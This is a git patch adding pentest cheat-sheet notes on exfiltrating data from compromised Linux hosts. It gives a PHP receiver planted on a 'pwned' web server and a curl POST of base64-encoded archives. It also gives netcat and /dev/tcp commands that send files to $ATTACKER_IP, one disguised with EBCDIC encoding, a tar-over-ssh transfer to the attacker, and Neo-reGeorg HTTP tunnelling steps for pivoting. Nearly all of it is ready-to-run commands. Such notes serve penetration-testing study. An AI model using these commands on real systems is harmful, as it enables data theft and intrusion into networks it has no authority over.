From 851ed5ef3b83863b150bbe53ffca8afaa9f120e5 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Sat, 27 Aug 2022 23:21:28 +0200
Subject: [PATCH] added http to exfiltration

---
 exfiltration/linux/http_php.md | 47 ++++++++++++++++++++++++++++++++++
 exfiltration/linux/nc.md       | 24 +++++++++++++++++
 exfiltration/linux/ssh.md      | 11 ++++++++
 3 files changed, 82 insertions(+)
 create mode 100644 exfiltration/linux/http_php.md
 create mode 100644 exfiltration/linux/ssh.md

diff --git a/exfiltration/linux/http_php.md b/exfiltration/linux/http_php.md
new file mode 100644
index 0000000..b5cf972
--- /dev/null
+++ b/exfiltration/linux/http_php.md
@@ -0,0 +1,47 @@
+# HTTP/PHP Exfiltration
+
+* On a pwned web server concat the following PHP code to an existing page
+```php
+<?php 
+if (isset($_POST['file'])) {
+        $file = fopen("/tmp/out.b64","w");
+        fwrite($file, $_POST['file']);
+        fclose($file);
+   }
+?>
+```
+
+* POST the payload to the controlled web server
+```sh
+curl --data "file=$(tar zcf - <directory> | base64)" http://example.com/about.php
+```
+
+* Prepare the stored file through removing the url encoding
+```sh
+sudo sed -i 's/ /+/g' /tmp/out.b64
+```
+
+* Unarchive the data
+```sh
+cat /tmp/out.b64 | base64 -d | tar xvfz -
+```
+
+## Pivot via Tunneling over HTTP
+
+* [Neo-reGeorg's tool](https://github.com/L-codes/Neo-reGeorg)
+
+* Generate an encrypted client with a key via
+```sh
+python3 neoreg.py generate -k key.enc
+```
+
+* Upload `tunnel.php` to the web server created
+* Trigger the tunnel via
+```sh
+python3 neoreg.py -k key.enc -u http://example.com/tunnel.php
+```
+
+* Start socks5 via
+```sh
+curl --socks5 127.0.0.1:1080 http://target.example.com
+```
diff --git a/exfiltration/linux/nc.md b/exfiltration/linux/nc.md
index 8ab23e8..c96f77b 100644
--- a/exfiltration/linux/nc.md
+++ b/exfiltration/linux/nc.md
@@ -1,11 +1,35 @@
 # Netcat
 
+## Receiver
+
 * RX
 ```sh
 nc -lp 8080 > out.txt
 ```
+
+## Transceiver
+
 * TX
 ```sh
 nc $ATTACKER_IP 8080 < in.txt
 ```
+
+* TX without nc
+```sh
+cat <file> > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT
+```
+
 * Have to be end manually after a while
+
+## Compress and Encode
+
+* Compress and encode the transmitted data
+```sh
+tar cfz - <directory> | base64 | dd conv=ebcdic > /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT
+```
+
+* On receiver's side, after `out.data` has been received
+```sh
+dd conv=ascii if=out.data | base64 -d > out.tar
+tar xvf out.tar
+```
diff --git a/exfiltration/linux/ssh.md b/exfiltration/linux/ssh.md
new file mode 100644
index 0000000..9153e40
--- /dev/null
+++ b/exfiltration/linux/ssh.md
@@ -0,0 +1,11 @@
+# SSH Exfiltration
+
+* Given: without `scp`
+
+## Compress
+
+* Archive the data on target, send it to the attacker. Unpack including preserved permissions
+```sh
+tar cf - <directory> | ssh user@$ATTACKER_IP "cd /tmp/; tar xpf -"
+```
+